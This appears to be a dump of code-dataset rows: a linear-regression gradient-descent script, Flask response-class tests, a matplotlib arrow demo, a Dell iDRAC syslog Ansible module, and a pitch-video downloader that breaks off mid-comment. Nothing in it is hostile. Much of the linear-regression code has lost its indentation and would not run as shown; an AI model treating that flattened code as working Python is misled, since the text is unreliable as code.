    cost_func0 = (1/m) * cost_func0 # Finding the average of the calculated derivatives by dividing it by 'm'
cost_func1 = (1/m) * cost_func1
theta0 = theta0 - alpha * cost_func0 # Finally calculating values of theta0 and theta1 and then returning it.
theta1 = theta1 - alpha * cost_func1
return theta0,theta1
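# Added note (illustration of the maths implemented above, not part of the original script):
# this is batch gradient descent on the cost J(theta0, theta1) = (1/(2*m)) * sum((h(x_i) - y_i)**2)
# with h(x) = theta0 + theta1*x, using the updates
#   theta0 := theta0 - alpha * (1/m) * sum(h(x_i) - y_i)
#   theta1 := theta1 - alpha * (1/m) * sum((h(x_i) - y_i) * x_i)
# where alpha is the learning rate set above.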
def cost_function(x,y,theta0,theta1): # This function is used for calculating Mean squared error or for minimization of cost function value.
m = len(x)
k=0
hypo = 0
mini = 0 # This will store the calculated minimized value of cost function.
    while k<m: # calculating the summation of all the differences between the calculated hypothesis value and the actual value (i.e. (h_theta(x) - y)^2)
hypo = theta0 + theta1 * x[k]
mini = mini + np.power((hypo - y[k]),2)
k+=1
    mini = mini/(2*m) # calculating the average of the summed cost function value by dividing it by '2*m' and then returning the value.
return mini
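# Added illustration (hypothetical data, not from the original script): for points lying
# exactly on y = 1 + 2*x the squared-error cost above should come out as (approximately) 0.
def _demo_cost_function():
    x_demo = pd.Series([0.0, 1.0, 2.0, 3.0])
    y_demo = 1.0 + 2.0 * x_demo
    return cost_function(x_demo, y_demo, 1.0, 2.0)   # expected ~0.0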
if __name__ == '__main__':
data = pd.read_csv('../../Datasets/linearRegression_Dataset.txt', header = None) #Loading dataset file and storing in 'data' variable.
    x = data.iloc[:,0] # separately storing column 0 in x.
    y = data.iloc[:,1] # separately storing column 1 in y.
theta0 = 0 #Initializing theta values with '0'.
theta1 = 0
i=0 #Initializing the iteration counter.
while(i<=1500): #Using iteration for finding the global minimum state and will consider the 1500'th iteration returning value as parameter value.
        theta0,theta1 = gradient_decent(x,y,theta0,theta1) # Calling the gradient_decent function which will return updated theta values based on the earlier values of theta.
min_j = cost_function(x,y,theta0,theta1) # Calling cost_function for calculating squared mean error for the new value.
i+=1
print("Theta :: %.3f %.3f " %(theta0,theta1)) # Displaying the values of theta which will be used for computation of hypothesis function.
print("Cost value :: ",min_j) # Displaying the minimum cost function for final values of theta0 and theta1
plt.scatter(x,y) # Ploting graph of dataset and the hypothesis function.
plt.xlabel(" X axis")
plt.ylabel(" Y axis")
    plt.plot(x, theta0 + theta1*x) # plot the fitted hypothesis line, including the intercept theta0
plt.show()
| ############################################################################################################################
'''
Linear Regression implementation in Python 3
By - <NAME>
- Using Gradient descent algorithm for finding parameter values.
- Without regularization.
:: Variables used ::
1) data :- This variable is used for storing the data fetched from the dataset file.
2) x,y :- 'x' and 'y' are used for storing the columns of the dataset file in separate variables.
3) theta0, theta1 :- These are the parameters used in the hypothesis function. (Initialized with 0)
4) i :- For counting the number of iterations done for calculating gradient descent and the cost function.
5) min_j :- It stores the value returned by the cost function after passing the latest values of theta0 and theta1.
6) m :- For counting the number of training examples. (Total number of rows)
7) j :- For counting number of training data which has been used for evaluation of gradient function.
8) hypo :- For calculating hypothesis value (i.e h THETA (x) = theta0 + theta1*x).
9) cost_func0 :- This is used to store cost function value for gradient descent of theta0.
10) cost_func1 :-This is used to store cost function value for gradient descent of theta1.
(There are two cost function variables because they accumulate different values. As given in
the formula of gradient descent for theta1, each term ends up multiplied by 'x', which is not the
case when calculating the gradient descent step for theta0.)
11) alpha :- It is used for storing learning rate of gradient descent.
12) k :- For counting number of training data which has been used for evaluation of Cost function.
13) mini :- This stores the value of cost function after minimization.
:: Functions used ::
1) gradient_decent() :- This function is used for calculating the parameter values by using the gradient descent algorithm.
It returns the two calculated theta values (theta0, theta1).
2) cost_function() :- This function is used for calculating the cost function or squared mean error.
'''
##################################################################################################################################
import pandas as pd # Importing required modules
import matplotlib.pyplot as plt
import numpy as np
def gradient_decent(x,y,theta0,theta1): # This function will calculate parameter values using the gradient descent algorithm.
m = len(x) # Initializing total number of training data.
j=0 # Initializing counter for counting number of training data which has been used in calculating parameter values.
hypo = 0 # Initializing variable for storing hypothesis equation value.
cost_func0 = 0 # Initializing for storing cost function values.
cost_func1 = 0
    alpha = 0.01 # Initializing the learning rate for the gradient descent algorithm.
while j<m: # finding sum of all the derivatives for calculating gradient descent.
hypo = theta0 + theta1*x[j]
cost_func0 = cost_func0 + (hypo - y[j])
cost_func1 = cost_func1 + (hypo - y[j])*x[j]
j+=1
    cost_func0 = (1/m) * cost_func0 # Finding the average of the calculated derivatives by dividing it by 'm'
cost_func1 = (1/m) * cost_func1
theta0 = theta0 - alpha * cost_func0 # Finally calculating values of theta0 and theta1 and then returning it.
theta1 = theta1 - alpha * cost_func1
return theta0,theta1
def cost_function(x,y,theta0,theta1): # This function is used for calculating Mean squared error or for minimization of cost function value.
m = len(x)
k=0
hypo = 0
mini = 0 # This will store the calculated minimized value of cost function.
    while k<m: # calculating the summation of all the differences between the calculated hypothesis value and the actual value (i.e. (h_theta(x) - y)^2)
hypo = theta0 + theta1 * x[k]
mini = mini + np.power((hypo - y[k]),2)
k+=1
    mini = mini/(2*m) # calculating the average of the summed cost function value by dividing it by '2*m' and then returning the value.
return mini
if __name__ == '__main__':
data = pd.read_csv('../../Datasets/linearRegression_Dataset.txt', header = None) #Loading dataset file and storing in 'data' variable.
    x = data.iloc[:,0] # separately storing column 0 in x.
    y = data.iloc[:,1] # separately storing column 1 in y.
theta0 = 0 #Initializing theta values with '0'.
theta1 = 0
i=0 #Initializing the iteration counter.
while(i<=1500): #Using iteration for finding the global minimum state and will consider the 1500'th iteration returning value as parameter value.
        theta0,theta1 = gradient_decent(x,y,theta0,theta1) # Calling the gradient_decent function which will return updated theta values based on the earlier values of theta.
min_j = cost_function(x,y,theta0,theta1) # Calling cost_function for calculating squared mean error for the new value.
i+=1
print("Theta :: %.3f %.3f " %(theta0,theta1)) # Displaying the values of theta which will be used for computation of hypothesis function.
print("Cost value :: ",min_j) # Displaying the minimum cost function for final values of theta0 and theta1
plt.scatter(x,y) # Ploting graph of dataset and the hypothesis function.
plt.xlabel(" X axis")
plt.ylabel(" Y axis")
    plt.plot(x, theta0 + theta1*x) # plot the fitted hypothesis line, including the intercept theta0
plt.show() | en | 0.689926 | ############################################################################################################################ Linear Regression implementation in Python 3 By - <NAME> - Using Gradient descent algorithm for finding parameter values. - Without regularization. :: Variables used :: 1) data :- This variable is used for storing data fetch from dataset file. 2) x,y :- 'x' and 'y' is used for storing coloumns data of dataset file in seprate variables. 3) theta0, theta1 :- These are the parameters used in hypothesis function. (Initialized with 0) 4) i :- For counting number of iterations done for calculating gradient decent and cost function. 5) min_j :- It stores the value return by cost function after passing latest values of theta0 and theta1. 6) m :- For counting number of training data.(Total number of rows) 7) j :- For counting number of training data which has been used for evaluation of gradient function. 8) hypo :- For calculating hypothesis value (i.e h THETA (x) = theta0 + theta1*x). 9) cost_func0 :- This is used to store cost function value for gradient descent of theta0. 10) cost_func1 :-This is used to store cost function value for gradient descent of theta1. (There are two cost function variables because they calculate different values. As given in the formaule of gradient decent for theat1 it ends up with product of 'x' which is not in case of calculating gradient descent for theat0) 11) alpha :- It is used for storing learning rate of gradient descent. 12) k :- For counting number of training data which has been used for evaluation of Cost function. 13) mini :- This stores the value of cost function after minimization. :: Functions used :: 1) gradient_decent() :- This fucntion is used for calculating the parameter valuese by using gradient descent algorithm. It returns two theta values(theta0,theta1) which is calculated. 2) cost_function() :- This function is used for calculating the cost function or squared mean error. ################################################################################################################################## # Importing required modules # This fucntion will calculate parameter values using gradient descent algorithm. # Initializing total number of training data. # Initializing counter for counting number of training data which has been used in calculating parameter values. # Initializing variable for storing hypothesis equation value. # Initializing for storing cost function values. # Initializing learing rate for gradient descent algorithm. # finding sum of all the derivatives for calculating gradient descent. # Finding the average of the calculated derivatives by dviding it by 'm' # Finally calculating values of theta0 and theta1 and then returning it. # This function is used for calculating Mean squared error or for minimization of cost function value. # This will store the calculated minimized value of cost function. # calculating sumation of all the diffences between calculated hypothesis value and the actual yalue (i.e (h Theta (x) - y)^2) # calculating average of the summed cost function value by dviding it with '2*m' and then returning the value. #Loading dataset file and storing in 'data' variable. #sepratly storing the coloumn 0 in x. #sepratly storing the coloumn 1 in y. #Initializing theta values with '0'. #Initializing the iteration counter. #Using iteration for finding the global minimum state and will consider the 1500'th iteration returning value as parameter value. 
# Calling gradient_decent function which will return updatae theta values based on earlier values of theta. # Calling cost_function for calculating squared mean error for the new value. # Displaying the values of theta which will be used for computation of hypothesis function. # Displaying the minimum cost function for final values of theta0 and theta1 # Ploting graph of dataset and the hypothesis function. | 3.881946 | 4 |
tests/lowball/builtins/response_class/test_response_class.py | EmersonElectricCo/lowball | 3 | 6632533 | import json
from flask import Response
from lowball.builtins.response_class import LowballResponse
class TestLowballResponseClassForceType:
def test_forces_type_properly_for_dicts(self, dict_return_value, client_with_response_class, expected_dict_return):
forced_response = LowballResponse.force_type(dict_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == expected_dict_return
def test_forces_type_properly_for_sequence_types(self, sequence_return_value, client_with_response_class):
forced_response = LowballResponse.force_type(sequence_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == b'[1,2,3]\n'
def test_forces_type_properly_for_ints(self, int_return_value):
forced_response = LowballResponse.force_type(int_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(int_return_value).encode()
def test_forces_type_properly_for_floats(self, float_return_value):
forced_response = LowballResponse.force_type(float_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(float_return_value).encode()
def test_forces_type_properly_for_complex_type(self, complex_return_value):
forced_response = LowballResponse.force_type(complex_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(complex_return_value).encode()
def test_forces_type_properly_for_memoryviews(self, memoryview_return_value):
forced_response = LowballResponse.force_type(memoryview_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == bytes(memoryview_return_value)
def test_passes_response_object_to_super(self, response_return_value, mocked_response_force_type):
forced_response = LowballResponse.force_type(response_return_value)
assert isinstance(forced_response, LowballResponse)
Response.force_type.assert_called_once_with(response=response_return_value, environ=None)
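# Added note (illustration): the fixtures used above (dict_return_value, sequence_return_value,
# int_return_value, ...) come from the suite's conftest and are assumed to be plain Python
# values; the b'[1,2,3]\n' assertion implies something along the lines of
#
#     @pytest.fixture
#     def sequence_return_value():
#         return [1, 2, 3]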
| import json
from flask import Response
from lowball.builtins.response_class import LowballResponse
class TestLowballResponseClassForceType:
def test_forces_type_properly_for_dicts(self, dict_return_value, client_with_response_class, expected_dict_return):
forced_response = LowballResponse.force_type(dict_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == expected_dict_return
def test_forces_type_properly_for_sequence_types(self, sequence_return_value, client_with_response_class):
forced_response = LowballResponse.force_type(sequence_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == b'[1,2,3]\n'
def test_forces_type_properly_for_ints(self, int_return_value):
forced_response = LowballResponse.force_type(int_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(int_return_value).encode()
def test_forces_type_properly_for_floats(self, float_return_value):
forced_response = LowballResponse.force_type(float_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(float_return_value).encode()
def test_forces_type_properly_for_complex_type(self, complex_return_value):
forced_response = LowballResponse.force_type(complex_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == str(complex_return_value).encode()
def test_forces_type_properly_for_memoryviews(self, memoryview_return_value):
forced_response = LowballResponse.force_type(memoryview_return_value)
assert isinstance(forced_response, LowballResponse)
assert forced_response.data == bytes(memoryview_return_value)
def test_passes_response_object_to_super(self, response_return_value, mocked_response_force_type):
forced_response = LowballResponse.force_type(response_return_value)
assert isinstance(forced_response, LowballResponse)
Response.force_type.assert_called_once_with(response=response_return_value, environ=None)
| none | 1 | 2.67082 | 3 |
|
matplotlib_examples/examples_src/pylab_examples/fancyarrow_demo.py | xzlmark/webspider | 3 | 6632534 | <filename>matplotlib_examples/examples_src/pylab_examples/fancyarrow_demo.py
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
styles = mpatches.ArrowStyle.get_styles()
ncol = 2
nrow = (len(styles) + 1) // ncol
figheight = (nrow + 0.5)
fig1 = plt.figure(1, (4.*ncol/1.5, figheight/1.5))
fontsize = 0.2 * 70
ax = fig1.add_axes([0, 0, 1, 1], frameon=False, aspect=1.)
ax.set_xlim(0, 4*ncol)
ax.set_ylim(0, figheight)
def to_texstring(s):
s = s.replace("<", r"$<$")
s = s.replace(">", r"$>$")
s = s.replace("|", r"$|$")
return s
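# Added note (illustration): arrow style names such as "-|>" contain characters that are
# special when rendered as TeX, so to_texstring("-|>") returns r"-$|$$>$" before the name
# is passed to ax.annotate below.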
for i, (stylename, styleclass) in enumerate(sorted(styles.items())):
x = 3.2 + (i//nrow)*4
y = (figheight - 0.7 - i % nrow) # /figheight
p = mpatches.Circle((x, y), 0.2)
ax.add_patch(p)
ax.annotate(to_texstring(stylename), (x, y),
(x - 1.2, y),
#xycoords="figure fraction", textcoords="figure fraction",
ha="right", va="center",
size=fontsize,
arrowprops=dict(arrowstyle=stylename,
patchB=p,
shrinkA=5,
shrinkB=5,
fc="k", ec="k",
connectionstyle="arc3,rad=-0.05",
),
bbox=dict(boxstyle="square", fc="w"))
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
plt.draw()
plt.show()
| <filename>matplotlib_examples/examples_src/pylab_examples/fancyarrow_demo.py
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
styles = mpatches.ArrowStyle.get_styles()
ncol = 2
nrow = (len(styles) + 1) // ncol
figheight = (nrow + 0.5)
fig1 = plt.figure(1, (4.*ncol/1.5, figheight/1.5))
fontsize = 0.2 * 70
ax = fig1.add_axes([0, 0, 1, 1], frameon=False, aspect=1.)
ax.set_xlim(0, 4*ncol)
ax.set_ylim(0, figheight)
def to_texstring(s):
s = s.replace("<", r"$<$")
s = s.replace(">", r"$>$")
s = s.replace("|", r"$|$")
return s
for i, (stylename, styleclass) in enumerate(sorted(styles.items())):
x = 3.2 + (i//nrow)*4
y = (figheight - 0.7 - i % nrow) # /figheight
p = mpatches.Circle((x, y), 0.2)
ax.add_patch(p)
ax.annotate(to_texstring(stylename), (x, y),
(x - 1.2, y),
#xycoords="figure fraction", textcoords="figure fraction",
ha="right", va="center",
size=fontsize,
arrowprops=dict(arrowstyle=stylename,
patchB=p,
shrinkA=5,
shrinkB=5,
fc="k", ec="k",
connectionstyle="arc3,rad=-0.05",
),
bbox=dict(boxstyle="square", fc="w"))
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
plt.draw()
plt.show()
| en | 0.187068 | # /figheight #xycoords="figure fraction", textcoords="figure fraction", | 2.349293 | 2 |
venv/lib/python3.6/site-packages/ansible_collections/dellemc/openmanage/plugins/modules/idrac_syslog.py | usegalaxy-no/usegalaxy | 1 | 6632535 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Dell EMC OpenManage Ansible Modules
# Version 3.5.0
# Copyright (C) 2018-2021 Dell Inc. or its subsidiaries. All Rights Reserved.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
---
module: idrac_syslog
short_description: Enable or disable the syslog on iDRAC
version_added: "2.1.0"
description:
- This module allows to enable or disable the iDRAC syslog.
extends_documentation_fragment:
- dellemc.openmanage.idrac_auth_options
- dellemc.openmanage.network_share_options
options:
syslog:
description: Enables or disables an iDRAC syslog.
choices: [Enabled, Disabled]
type: str
default: Enabled
requirements:
- "omsdk"
- "python >= 2.7.5"
author:
- "<NAME> (@felixs88)"
- "<NAME> (@anooja-vardhineni)"
notes:
- This module requires 'Administrator' privilege for I(idrac_user).
- Run this module from a system that has direct access to Dell EMC iDRAC.
- This module supports C(check_mode).
"""
EXAMPLES = """
---
- name: Enable iDRAC syslog
dellemc.openmanage.idrac_syslog:
idrac_ip: "192.168.0.1"
idrac_user: "user_name"
idrac_password: "<PASSWORD>"
share_name: "192.168.0.2:/share"
share_password: "<PASSWORD>"
share_user: "share_user_name"
share_mnt: "/mnt/share"
syslog: "Enabled"
- name: Disable iDRAC syslog
dellemc.openmanage.idrac_syslog:
idrac_ip: "192.168.0.1"
idrac_user: "user_name"
idrac_password: "<PASSWORD>"
share_name: "192.168.0.2:/share"
share_password: "<PASSWORD>"
share_user: "share_user_name"
share_mnt: "/mnt/share"
syslog: "Disabled"
"""
RETURN = r'''
---
msg:
description: Overall status of the syslog export operation.
returned: always
type: str
sample: "Successfully fetch the syslogs."
syslog_status:
description: Job details of the syslog operation.
returned: success
type: dict
sample: {
"@odata.context": "/redfish/v1/$metadata#DellJob.DellJob",
"@odata.id": "/redfish/v1/Managers/iDRAC.Embedded.1/Jobs/JID_852940632485",
"@odata.type": "#DellJob.v1_0_2.DellJob",
"CompletionTime": "2020-03-27T02:27:45",
"Description": "Job Instance",
"EndTime": null,
"Id": "JID_852940632485",
"JobState": "Completed",
"JobType": "ImportConfiguration",
"Message": "Successfully imported and applied Server Configuration Profile.",
"MessageArgs": [],
"<EMAIL>": 0,
"MessageId": "SYS053",
"Name": "Import Configuration",
"PercentComplete": 100,
"StartTime": "TIME_NOW",
"Status": "Success",
"TargetSettingsURI": null,
"retval": true
}
error_info:
description: Details of the HTTP Error.
returned: on HTTP error
type: dict
sample: {
"error": {
"code": "Base.1.0.GeneralError",
"message": "A general error has occurred. See ExtendedInfo for more information.",
"@Message.ExtendedInfo": [
{
"MessageId": "GEN1234",
"RelatedProperties": [],
"Message": "Unable to process the request because an error occurred.",
"MessageArgs": [],
"Severity": "Critical",
"Resolution": "Retry the operation. If the issue persists, contact your system administrator."
}
]
}
}
'''
import json
from ansible_collections.dellemc.openmanage.plugins.module_utils.dellemc_idrac import iDRACConnection
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.error import URLError, HTTPError
from ansible.module_utils.urls import ConnectionError, SSLValidationError
try:
from omsdk.sdkfile import file_share_manager
from omsdk.sdkcreds import UserCredentials
except ImportError:
pass
def run_setup_idrac_syslog(idrac, module):
idrac.use_redfish = True
upd_share = file_share_manager.create_share_obj(share_path=module.params['share_name'],
mount_point=module.params['share_mnt'],
isFolder=True,
creds=UserCredentials(
module.params['share_user'],
module.params['share_password']))
if not upd_share.IsValid:
module.fail_json(msg="Unable to access the share. Ensure that the share name, "
"share mount, and share credentials provided are correct.")
idrac.config_mgr.set_liason_share(upd_share)
if module.check_mode:
if module.params['syslog'] == 'Enabled':
idrac.config_mgr.enable_syslog(apply_changes=False)
elif module.params['syslog'] == 'Disabled':
idrac.config_mgr.disable_syslog(apply_changes=False)
msg = idrac.config_mgr.is_change_applicable()
else:
if module.params['syslog'] == 'Enabled':
msg = idrac.config_mgr.enable_syslog()
elif module.params['syslog'] == 'Disabled':
msg = idrac.config_mgr.disable_syslog()
return msg
def main():
module = AnsibleModule(
argument_spec={
"idrac_ip": {"required": True, "type": 'str'},
"idrac_user": {"required": True, "type": 'str'},
"idrac_password": {"required": True, "type": 'str', "aliases": ['idrac_pwd'], "no_log": True},
"idrac_port": {"required": False, "default": 443, "type": 'int'},
"share_name": {"required": True, "type": 'str'},
"share_user": {"required": False, "type": 'str'},
"share_password": {"required": False, "type": 'str', "aliases": ['share_pwd'], "no_log": True},
"share_mnt": {"required": False, "type": 'str'},
"syslog": {"required": False, "choices": ['Enabled', 'Disabled'], "default": 'Enabled'}
},
supports_check_mode=True)
try:
with iDRACConnection(module.params) as idrac:
msg = run_setup_idrac_syslog(idrac, module)
changed = False
if msg.get('Status') == "Success":
changed = True
if msg.get('Message') == "No changes found to commit!":
changed = False
except HTTPError as err:
module.fail_json(msg=str(err), error_info=json.load(err))
except URLError as err:
module.exit_json(msg=str(err), unreachable=True)
except AttributeError as err:
if "NoneType" in str(err):
module.fail_json(msg="Unable to access the share. Ensure that the share name, "
"share mount, and share credentials provided are correct.")
except (RuntimeError, SSLValidationError, ConnectionError, KeyError,
ImportError, ValueError, TypeError) as e:
module.fail_json(msg=str(e))
module.exit_json(msg="Successfully fetch the syslogs.",
syslog_status=msg, changed=changed)
if __name__ == '__main__':
main()
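# Added usage note (illustration): with one of the playbook snippets from EXAMPLES above
# saved as, say, syslog.yml, the module would typically be exercised with
#   ansible-playbook -i <inventory> syslog.yml
# (the playbook file name and inventory are placeholders, not part of the original module).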
| #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Dell EMC OpenManage Ansible Modules
# Version 3.5.0
# Copyright (C) 2018-2021 Dell Inc. or its subsidiaries. All Rights Reserved.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
---
module: idrac_syslog
short_description: Enable or disable the syslog on iDRAC
version_added: "2.1.0"
description:
- This module allows to enable or disable the iDRAC syslog.
extends_documentation_fragment:
- dellemc.openmanage.idrac_auth_options
- dellemc.openmanage.network_share_options
options:
syslog:
description: Enables or disables an iDRAC syslog.
choices: [Enabled, Disabled]
type: str
default: Enabled
requirements:
- "omsdk"
- "python >= 2.7.5"
author:
- "<NAME> (@felixs88)"
- "<NAME> (@anooja-vardhineni)"
notes:
- This module requires 'Administrator' privilege for I(idrac_user).
- Run this module from a system that has direct access to Dell EMC iDRAC.
- This module supports C(check_mode).
"""
EXAMPLES = """
---
- name: Enable iDRAC syslog
dellemc.openmanage.idrac_syslog:
idrac_ip: "192.168.0.1"
idrac_user: "user_name"
idrac_password: "<PASSWORD>"
share_name: "192.168.0.2:/share"
share_password: "<PASSWORD>"
share_user: "share_user_name"
share_mnt: "/mnt/share"
syslog: "Enabled"
- name: Disable iDRAC syslog
dellemc.openmanage.idrac_syslog:
idrac_ip: "192.168.0.1"
idrac_user: "user_name"
idrac_password: "<PASSWORD>"
share_name: "192.168.0.2:/share"
share_password: "<PASSWORD>"
share_user: "share_user_name"
share_mnt: "/mnt/share"
syslog: "Disabled"
"""
RETURN = r'''
---
msg:
description: Overall status of the syslog export operation.
returned: always
type: str
sample: "Successfully fetch the syslogs."
syslog_status:
description: Job details of the syslog operation.
returned: success
type: dict
sample: {
"@odata.context": "/redfish/v1/$metadata#DellJob.DellJob",
"@odata.id": "/redfish/v1/Managers/iDRAC.Embedded.1/Jobs/JID_852940632485",
"@odata.type": "#DellJob.v1_0_2.DellJob",
"CompletionTime": "2020-03-27T02:27:45",
"Description": "Job Instance",
"EndTime": null,
"Id": "JID_852940632485",
"JobState": "Completed",
"JobType": "ImportConfiguration",
"Message": "Successfully imported and applied Server Configuration Profile.",
"MessageArgs": [],
"<EMAIL>": 0,
"MessageId": "SYS053",
"Name": "Import Configuration",
"PercentComplete": 100,
"StartTime": "TIME_NOW",
"Status": "Success",
"TargetSettingsURI": null,
"retval": true
}
error_info:
description: Details of the HTTP Error.
returned: on HTTP error
type: dict
sample: {
"error": {
"code": "Base.1.0.GeneralError",
"message": "A general error has occurred. See ExtendedInfo for more information.",
"@Message.ExtendedInfo": [
{
"MessageId": "GEN1234",
"RelatedProperties": [],
"Message": "Unable to process the request because an error occurred.",
"MessageArgs": [],
"Severity": "Critical",
"Resolution": "Retry the operation. If the issue persists, contact your system administrator."
}
]
}
}
'''
import json
from ansible_collections.dellemc.openmanage.plugins.module_utils.dellemc_idrac import iDRACConnection
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six.moves.urllib.error import URLError, HTTPError
from ansible.module_utils.urls import ConnectionError, SSLValidationError
try:
from omsdk.sdkfile import file_share_manager
from omsdk.sdkcreds import UserCredentials
except ImportError:
pass
def run_setup_idrac_syslog(idrac, module):
idrac.use_redfish = True
upd_share = file_share_manager.create_share_obj(share_path=module.params['share_name'],
mount_point=module.params['share_mnt'],
isFolder=True,
creds=UserCredentials(
module.params['share_user'],
module.params['share_password']))
if not upd_share.IsValid:
module.fail_json(msg="Unable to access the share. Ensure that the share name, "
"share mount, and share credentials provided are correct.")
idrac.config_mgr.set_liason_share(upd_share)
if module.check_mode:
if module.params['syslog'] == 'Enabled':
idrac.config_mgr.enable_syslog(apply_changes=False)
elif module.params['syslog'] == 'Disabled':
idrac.config_mgr.disable_syslog(apply_changes=False)
msg = idrac.config_mgr.is_change_applicable()
else:
if module.params['syslog'] == 'Enabled':
msg = idrac.config_mgr.enable_syslog()
elif module.params['syslog'] == 'Disabled':
msg = idrac.config_mgr.disable_syslog()
return msg
def main():
module = AnsibleModule(
argument_spec={
"idrac_ip": {"required": True, "type": 'str'},
"idrac_user": {"required": True, "type": 'str'},
"idrac_password": {"required": True, "type": 'str', "aliases": ['idrac_pwd'], "no_log": True},
"idrac_port": {"required": False, "default": 443, "type": 'int'},
"share_name": {"required": True, "type": 'str'},
"share_user": {"required": False, "type": 'str'},
"share_password": {"required": False, "type": 'str', "aliases": ['share_pwd'], "no_log": True},
"share_mnt": {"required": False, "type": 'str'},
"syslog": {"required": False, "choices": ['Enabled', 'Disabled'], "default": 'Enabled'}
},
supports_check_mode=True)
try:
with iDRACConnection(module.params) as idrac:
msg = run_setup_idrac_syslog(idrac, module)
changed = False
if msg.get('Status') == "Success":
changed = True
if msg.get('Message') == "No changes found to commit!":
changed = False
except HTTPError as err:
module.fail_json(msg=str(err), error_info=json.load(err))
except URLError as err:
module.exit_json(msg=str(err), unreachable=True)
except AttributeError as err:
if "NoneType" in str(err):
module.fail_json(msg="Unable to access the share. Ensure that the share name, "
"share mount, and share credentials provided are correct.")
except (RuntimeError, SSLValidationError, ConnectionError, KeyError,
ImportError, ValueError, TypeError) as e:
module.fail_json(msg=str(e))
module.exit_json(msg="Successfully fetch the syslogs.",
syslog_status=msg, changed=changed)
if __name__ == '__main__':
main()
| en | 0.547253 | #!/usr/bin/python # -*- coding: utf-8 -*- # # Dell EMC OpenManage Ansible Modules # Version 3.5.0 # Copyright (C) 2018-2021 Dell Inc. or its subsidiaries. All Rights Reserved. # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # --- module: idrac_syslog short_description: Enable or disable the syslog on iDRAC version_added: "2.1.0" description: - This module allows to enable or disable the iDRAC syslog. extends_documentation_fragment: - dellemc.openmanage.idrac_auth_options - dellemc.openmanage.network_share_options options: syslog: description: Enables or disables an iDRAC syslog. choices: [Enabled, Disabled] type: str default: Enabled requirements: - "omsdk" - "python >= 2.7.5" author: - "<NAME> (@felixs88)" - "<NAME> (@anooja-vardhineni)" notes: - This module requires 'Administrator' privilege for I(idrac_user). - Run this module from a system that has direct access to Dell EMC iDRAC. - This module supports C(check_mode). --- - name: Enable iDRAC syslog dellemc.openmanage.idrac_syslog: idrac_ip: "192.168.0.1" idrac_user: "user_name" idrac_password: "<PASSWORD>" share_name: "192.168.0.2:/share" share_password: "<PASSWORD>" share_user: "share_user_name" share_mnt: "/mnt/share" syslog: "Enabled" - name: Disable iDRAC syslog dellemc.openmanage.idrac_syslog: idrac_ip: "192.168.0.1" idrac_user: "user_name" idrac_password: "<PASSWORD>" share_name: "192.168.0.2:/share" share_password: "<PASSWORD>" share_user: "share_user_name" share_mnt: "/mnt/share" syslog: "Disabled" --- msg: description: Overall status of the syslog export operation. returned: always type: str sample: "Successfully fetch the syslogs." syslog_status: description: Job details of the syslog operation. returned: success type: dict sample: { "@odata.context": "/redfish/v1/$metadata#DellJob.DellJob", "@odata.id": "/redfish/v1/Managers/iDRAC.Embedded.1/Jobs/JID_852940632485", "@odata.type": "#DellJob.v1_0_2.DellJob", "CompletionTime": "2020-03-27T02:27:45", "Description": "Job Instance", "EndTime": null, "Id": "JID_852940632485", "JobState": "Completed", "JobType": "ImportConfiguration", "Message": "Successfully imported and applied Server Configuration Profile.", "MessageArgs": [], "<EMAIL>": 0, "MessageId": "SYS053", "Name": "Import Configuration", "PercentComplete": 100, "StartTime": "TIME_NOW", "Status": "Success", "TargetSettingsURI": null, "retval": true } error_info: description: Details of the HTTP Error. returned: on HTTP error type: dict sample: { "error": { "code": "Base.1.0.GeneralError", "message": "A general error has occurred. See ExtendedInfo for more information.", "@Message.ExtendedInfo": [ { "MessageId": "GEN1234", "RelatedProperties": [], "Message": "Unable to process the request because an error occurred.", "MessageArgs": [], "Severity": "Critical", "Resolution": "Retry the operation. If the issue persists, contact your system administrator." } ] } } | 1.473211 | 1 |
utils.py | rmcanada/pitcher-release-point | 0 | 6632536 | import os
import json
import urllib.request
import subprocess
import argparse
import shutil
parser = argparse.ArgumentParser()
parser.add_argument('--guid', help='guid from json of video')
json_files = [pos_json for pos_json in os.listdir('.') if pos_json.endswith('.json')]
def download_video(url):
try:
ret1 = subprocess.call(['wget',"-P", "./",url,])
if ret1 > 0:
raise Exception('could not wget')
except Exception as e:
print (str(e))
raise e
def get_video_url(pitch_dict):
# check to see that the data pertains to a pitch and not a pickoff
if (pitch_dict['isPickoff'] and not pitch_dict['isPitch']):
print("Not pitch, pick off")
return "Pickoff"
# subset info on playback types to iterate through
video_playbacks = pitch_dict['video']['playbackGroups']
# loop through playback types looking for centrefield camera
for i in range(len(video_playbacks)):
if video_playbacks[i]['mediaSourceType'] == "CENTERFIELD":
max_bit = 0
max_bit_index = None
# create subset of playback data pertaining to current data
cf = video_playbacks[i]
for iter, j in enumerate(cf['playbackRenditions']):
# if bitrate is higher than current max bitrate, pick
bitrate = int(j['bitrate'].strip("K"))
if bitrate > max_bit:
max_bit = bitrate
max_bit_index = iter
# print(max_bit_index)
video_url = cf['playbackRenditions'][max_bit_index]['playbackUrl']
return video_url
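# Added illustration (fabricated minimal pitch_dict, not real MLB data): shows how
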